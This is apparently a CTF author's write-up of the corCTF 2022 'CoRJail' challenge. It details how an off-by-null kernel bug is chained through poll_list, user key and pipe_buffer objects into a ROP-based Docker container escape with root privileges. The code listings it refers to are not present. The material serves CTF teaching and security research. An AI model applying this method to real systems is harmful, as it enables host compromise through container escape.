CoRJail is a kernel exploitation challenge designed for corCTF 2022. Players were asked to escape from a hardened Docker container with custom seccomp filters exploiting a Off-By-Null vulnerability in a Linux Kernel Module accessible via procfs. With this article, I present a novel kernel exploitation technique I originally used in the Google kCTF Vulnerability Reward Program to compromise Google’s hardened Kubernetes infrastructure, escaping from a nsjail and gaining root privileges on a Container Optimized OS. Let’s get started!
Last year FizzBuzz101 and me, designed two kernel exploitation challenges for corCTF 2021, Fire of Salvation and Wall of Perdition, demonstrating a novel technique to get arbitrary read and arbitrary write in the Linux kernel using msg_msg objects and userfaultfd. During this year, the technique has been extensively used in real world exploits and later extended to be used with FUSE instead of userfaultfd.
For corCTF 2022, we decided to do the same, designing two challenges of
which solutions required a novel approach. I decided to write CoRJail, demonstrating a novel
approach I originally used to compromise Google’s kCTF. This technique consists of an arbitrary
free primitive obtainable in almost every general purpose cache exploiting
poll_list objects. FizzBuzz101 instead, designed a challenge, Cache
of which solution required a cross-cache overflow into cred_jar to
corrupt the current task’s cred structure to get root privileges.
CoRJail consists of a hardened Docker container running on a custom Debian Bullseye image, improperly called CoROS. The default Docker seccomp profile was modified to block multiple syscalls, including msgget()/msgsnd() and msgrcv(). On the other hand, certain syscalls were made available, like add_key() and keyctl(), allowing the Linux Kernel Key Retention Service to be accessed from within the container. The custom seccomp profile can be found here.
The kernel, 5.10.127, was patched to enable per-CPU syscall usage statistics, using a modified version of this recent kernel patch: procfs - add syscall statistics. Certain subsystems, like io_uring and nftables, were not included in the kernel to reduce attack surface.
All modern protections, like
CONFIG_SLAB_FREELIST_HARDENED etc. were enabled.
CONFIG_STATIC_USERMODEHELPER was set to true,
forcing usermode helper calls through a single binary and
CONFIG_STATIC_USERMODEHELPER_PATH was set to an
empty string. In other words, no modprobe_path
Finally, I unset
CONFIG_KALLSYMS_ALL, making many symbols not
available in /proc/kallsyms.
The vulnerable Linux Kernel Module, CoRMon, accessible through a procfs
interface, was created to actually display per-CPU syscall count,
restricting the displayed result only to syscalls specified in a filter.
Users were allowed to set a new filter using
echo -n 'syscall_1,syscall_2,...' > /proc_rw/cormon.
echo -n 'sys_read,sys_write' > /proc_rw/cormon.
The default CoRMon filter was actually a hint, indeed it displayed many
syscalls I used in my exploit:
If you want to solve the challenge before reading the rest of the article, it can be found in the corCTF 2022 Public Archive.
Please note that I could not upload the coros.qcow2 image on Github because of its size, so you will need to build it yourself using the provided script.
Exploit a Off-By-Null in kmalloc-4k to corrupt a poll_list object and obtain an arbitrary free primitive. Free a user_key_payload structure and corrupt it to get OOB Read. Leak heap object / kernel pointer. Reuse poll_list to arbitrarily free a pipe_buffer structure, hijack control flow and escape from the container to get a CoR Flag License key and guess the correct options on the CoR Flag License Website to get the actual flag.
It’s Only A Zero, What Could Go Wrong?
Given the relatively complex exploitation stage and the 48 hours limit, I decided to make the bug extremely easy to spot and trigger. On the other hand I decided to not provide source code, considering the reverse engineering process would not have taken too long.
Here is the original CoRMon source code:
We can interact with the module through a procfs interface using
write(). When we use
cormon_proc_write() function is called to process the user input.
cormon_seq_show() function instead, is used to display syscalls
information when we use
As we can see, there is a clear Off-By-Null in
Let’s extract the function from source code and ignore the rest:
If the number of bytes written is greater than
PAGE_SIZE (4096) then
len variable is set to
PAGE_SIZE - 1, otherwise it is set to
Afterwards, a chunk of 4096 bytes is allocated in kmalloc-4k 
and the list of syscalls is copied from user-space to kernel-space: it
will be parsed by
update_filter().  The list,
now copied to kernel-space, is subsequently null terminated. 
The check is clearly not covering the case where the number of bytes
written is equal to
PAGE_SIZE. Indeed, in that case,
len would be
count, and the line
syscalls[len] = '\x00', would result in
syscalls = '\x00', causing the null byte to
be written out of bounds.
This, will be enough to escape from the container and get root privileges on the host.
A Dive Into poll_list Objects
As we mentioned in the previous section, the attack surface from within the container is very limited. For example, unshare is blocked by default by seccomp, so it is not possible to create user namespaces and this prevents us from accessing many kernel features.
Many other syscalls are
also blocked, including
msgrcv(), so for
this time the old good
msg_msg will be left out of the picture.
Instead, our exploitation process will mainly rely on
objects. This structure can be used from within the container without
having to meet any specific requirements.
The technique we will cover in this article, is a special case of the one I used on Google’s systems: in that case I had a virtually unlimited Out-Of-Bounds Write primitive, here instead we only have a single null byte written out of bounds.
poll_list objects, are allocated in kernel space when we use the poll() syscall to monitor activity on one or more file descriptors.
int poll(struct pollfd fds, nfds_t nfds, int timeout);
poll() accepts three arguments:
fds: an array of
nfds: the number of
pollfdstructures in the fds array.
timeout: the number of milliseconds for an event to occur.
poll_list structure, is composed by a pointer to the next
poll_list , a length field, corresponding to the number of
pollfd structures in the
entries array , and
flexible array of
pollfd structures . Each entry is 8 bytes
When we use the
is called in kernel-space. This function is responsible for copying the
entries we passed to
poll() in the
fds array to
do_sys_poll() has two paths, a slow and a fast path. As we can
see at the beginning of the function,
stack_pps , a buffer
of 256 bytes, is defined. It is used to store the first 30
entries . This is the fast path: entries are stored on the
stack to save memory and improve speed.
If we submit more than 30
pollfd entries, we enter the slow path and
the remaining ones are allocated on kernel heap. This means that
if we do the math correctly, controlling the number of monitored file
descriptors, we can control the allocation size, ranging from kmalloc-32 to kmalloc-4k. 
It is possible to allocate a maximum of
(510) entries per page.  If this limit is exceeded, a new
poll_list is allocated to store the remaining entries and it is
connected to the previous one in a singly linked list. The for loop continues until all entries have been stored in kernel memory.
Let’s say for example we call
poll(), providing 510 + 1 file
descriptors to the syscall. This, in kernel space, results in a
poll_list with 510 entries allocated in kmalloc-4k and a second
poll_list, with a single entry, allocated in kmalloc-32. The structures are connected in a singly linked list:
poll_list objects have been allocated, there is a call to
do_poll(): it will monitor provided file descriptors until a specific
event occurs or the timer expires.  The
end_time variable here,
corresponds to the
timeout variable we passed as third argument to the
This means that
poll_list objects can be kept in
memory for an arbitrary amount of time, then, when timer expires, they
will be automatically freed.
The very interesting part, is how
poll_list structures are freed: a
while loop is used to traverse the singly linked list, freeing each of
them.  Now let’s look at what we have from an attacker’s prospective.
We have a structure that can be allocated in multiple caches, ranging
from kmalloc-32 to kmalloc-4k, and the object pointed by its
field (first QWORD) is automatically freed when a timer, that we
control, expires. This means that given a Out-Of-Bounds Write or a
Use-After-Free Write primitive we can overwrite the
next field of a
poll_list structure with the address of a target object and when the
timer fires, that object will be automatically freed.
The only constraint, is that we need to make sure the first QWORD of the target object is NULL, otherwise the while loop, will treat it as a valid pointer, and will try to access it. This is not a problem, we can use a misaligned free primitive or we can simply target objects of which first QWORD is equal to zero.
In the specific case of kmalloc-4k, if the
already contains a valid pointer to another
poll_list, we can corrupt
it with a partial overwrite (even with a single byte), making it point
to another object in the slab. When timer expires, the kernel will be tricked into
freeing the wrong object. This, is exactly what we are going to
do in the exploit.
The following code can be used to allocate
poll_list structures in
kernel space. Note that we need to use threads to spray this object
poll() syscall will block until a specific event occurs or the timer expires.
The Exploit - From Zero To Information Leak
The strategy we are going to use in the first part of the exploit,
consists of utilizing the Off-By-Null in kmalloc-4k to corrupt the
next field of a
poll_list structure chained to another one in
kmalloc-32, making the corrupted pointer point to another object in the
slab. When the timer fires, that object will be automatically freed.
We need to choose a target structure that once arbirarily freed, can be
corrupted and can give us a Out-Of-Bounds Read primitive, with
subsequent information leak. There are multiple elastic objects in the
Linux kernel that may do the trick. A good candidate could be
but we need the first QWORD of the target object to be NULL, so we
cannot use it. Since
keyctl() are not blocked by seccomp, we can opt for
The problem with this structure, is that its first member,
struct rcu_head rcu, is not initialized, and
since the structure is allocated with
the first QWORD might not be NULL. A practical solution comes from
we can use it to fill the chunk with zeros before allocating each user key.
setxattr(), we can allocate a chunk of arbitrary size 
and fill it with arbitrary data , then, it will be
automatically freed right before the function returns . We can
exploit this function to make sure the uninitialized member of
user_key_payload is actually zero.
We simply need to call
setxattr() right before
alloc_key(): because of freelists LIFO
behavior, once the chunk used by
setxattr() is allocated, filled with
zeros and then freed, it will be reused by the user key. Now we can be sure the first QWORD is set to NULL.
With this in mind, we can start writing our exploit:
First, we assign the current process to core 0 using
wrapper), since we are working in a multi-core environment and slabs are
per-CPU.  Then, we start spraying many
structures in kmalloc-32 to fill partial slabs, so the next allocations
will end up in a brand new slab. 
We proceed using
alloc_key() (a simple
add_key() wrapper) to spray
user_key_payload structures in kmalloc-32.  As
explained above, we use
setxattr() to make sure the chunk is actually zeroed out before a new user key is allocated.
Now we finally spray
poll_list structures in kmalloc-4k, chained to
poll_list in kmalloc-32.  At this point the situation in
memory will probably be similar to [Fig. 1A], with unallocated
chunks in white,
poll_list in green, and
We can continue spraying more user keys in kmalloc-32, to completely saturate the slab.  [Fig. 1B]
We are ready to trigger the Off-By-Null bug, hijack a
next pointer and trigger the arbitrary free:
We can trigger the allocation of a chunk in kmalloc-4k by writing
4096 bytes to the CoRMon procfs interface.  This will also
cause a null byte to be written out of bounds, and will corrupt the next
object in memory. Since we sprayed
poll_list structures in
kmalloc-4k, and each one has a pointer to a
poll_list in kmalloc-32,
we will be able to corrupt one of the pointers, making it point to one
of the user keys we sprayed in the previous step. [Fig. 2A]
Now we can use
join_poll_threads() and wait until timers
poll_list objects are automatically freed.  One of the
user_key_payload will be released as well. [Fig. 2B]
We caused a Use-After-Free situation. Now we need to exploit it and corrupt the user key to obtain a Out-Of-Bounds Read primitive:
First, we spray many
structures in kmalloc-32. One of them will overwrite the user key we
freed in the previous step, corrupting its
len field (an unsigned
short) with the two lower bytes of the
In our case, the two lower bytes of
0x4330, so this will give us a huge Out-Of-Bounds
Read primitive. A
pointer instead, will overwrite the first qword in the user key data field.
 You can see the
seq_operations structures in yellow in
[Fig. 3A], one of them corrupted the key.
We can now use
leak_kernel_pointer() to iterate
through all the keys until we leak the
this way we will identify the corrupted key and we will be able to
calculate the kernel base address.  Now we need to reuse the
Out-Of-Bounds Read primitive to leak a heap address.
When we open a ptmx, two structures
of our interest are allocated, the well known
in kmalloc-1024 and another one,
in kmalloc-32. Each
tty_file_private structure, has a pointer to
tty_struct, therefore we can use it to leak the address of an object in
We can free all the keys in kmalloc-32 (orange chunks in [Fig.
3A]),  except the corrupted one, and replace
tty_file_private structures (blue chunks in [Fig.
3B]).  Then we call
leak_heap_pointer() and use the Out-Of-Bounds Read primitive to leak
tty_struct address.  [Fig. 3B]
The Exploit - Hijacking Control Flow
At this point we need to free the object in kmalloc-1024.
First, we free all the
seq_operations structures in kmalloc-32
(yellow chunks in [Fig. 3A-3B]) , then we replace them
poll_list objects (green chunks in [Fig. 4A]) .
Note that the
seq_operations structure used to corrupt the user key
is also freed and it is also replaced by a
Now we free the corrupted key, causing a Use-After-Free
situation over the
poll_list.  To exploit the
Use-After-Free, we reuse the
setxattr() trick used in the first stage,
but this time, instead of zeroing out the chunk, we set its first QWORD
target object - 0x18 bytes , then we
user_key_payload structure to consolidate the setxattr
buffer in memory.
In other words, since the chunk used by
automatically freed when the function returns, we allocate a user key
(remember, the first member of a
user_key_payload structure is not
initialized) to prevent the first QWORD we just set with setxattr from being overwritten by a subsequent allocation. 
Doing so, we
will overwrite the
next field of the
poll_list structure in
kmalloc-32 with the
target - 0x18 bytes.
Originally, my goal was to arbitrarily free a
tty_struct and get RIP
control overwriting its
pointer. Then I changed my mind (too many checks, even if they can be bypassed), and I decided to
We proceed freeing all TTYs ,
and we spray
pipe_buffer objects . This way we replace
pipe_buffer in kmalloc-1024. Then, we wait
until timers expire, and the
pipe_buffer object pointed by the
field of the corrupted
poll_list, is automatically freed. [Fig.
Finally, we free all user keys, and we reallocate them in kmalloc-1024:
we use them to spray our ROP-chain.  One of the key payloads
will corrupt the target
pipe_buffer, overwriting the
pointer with a stack pivot gadget.
Now we only need to close all pipes, triggering the call to pipe_release().  This, will execute our stack pivot gadget and we will be finally able to hijack control flow. [Fig. 5B]
The Exploit - Container Escape
The last piece of the puzzle is the ROP-chain to use to escape from the container. Let’s take a look to what I used in the exploit:
The first part has nothing special. We use a stack pivot gadget to hijack control flow , then prepare_kernel_cred()  and commit_creds()  to escalate privileges, and then we locate the Docker container task using find_task_by_vpid()  and we use switch_task_namespaces()  to replace its nsproxy structure with init_nsproxy. But this is not enough to escape from the container.
In Docker containers, unlike Google’s kCTF, setns() is blocked by default by seccomp, this means that we cannot use it to enter other namespaces after returning in user-space. We need to find an alternative approach, and we need to implement it in the ROP-chain.
source code, we can see that it calls
to actually move the task into a different namespace. We can replicate
what it does using
to clone the
structure , then we locate the current task using
find_task_by_vpid()  and we manually install the new
using a write-what-where gadget. 
We can finally use the KPTI
swapgs_restore_regs_and_return_to_usermode and get a shell on the host. 
Here is the final exploit in action:
The final exploit can be found here: exploit.c.
PS: In the exploit I assign
the process to another core before creating poll threads. This is useful
to reduce noise due to thread creation on core 0 slabs. Once a thread
has been created, it is assigned back to core-0 before calling
poll_list objects, can be used to obtain an arbitrary free
primitive in almost every general purpose cache. Many recent
vulnerabilities can be exploited using this structure in complete
CoRJail only had one solver. A big
shout out goes to Kylebot for getting first
blood. It turns out that Extended security
usable inside the container without requiring any special capability. So
he could solve the challenge transforming the Off-By-Null in kmalloc-4k
into a Cross-Cache Null Byte Overflow, targeting the
structure in kmalloc-192.
This cache is unaligned, so he made the corrupted pointer point in
middle of another
simple_xattr object in the same slab. Here, he forged
a fake header to obtain an Out-Of-Bounds Read primitive.
To fake a
simple_xattr structure, he needed a valid pointer containing controlled data in the
name field, so he ended up using another kCTF technique. He faked the pointer and its content using cpu_entry_area. This memory region is not affected by KASLR, and as reported by Kylebot, it is possible to use a div 0 or a ud2 instruction to copy all CPU registers in this zone and use them as a payload.
After obtaining information leak, he used the recent unlinking attack with simple_xattr to overwrite the file_operations pointer of a file structure with a controlled heap address. From here he could hijack control flow and use a ROP-chain to escape from the container. What a crazy approach! Isn’t it?
If you have any question or need any clarification, feel free to contact me. You can find my contact information in About.
The challenge can be downloaded from the corCTF 2022 Public Archive.
Syscall statistics patch
Utilizing msg_msg Objects For Arbitrary Read And Arbitrary Write In The Linux Kernel
- https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html (Part 1: Fire Of Salvation)
- https://syst3mfailure.io/wall-of-perdition (Part 2: Wall Of Perdition)
Unlinking attack with simple_xattr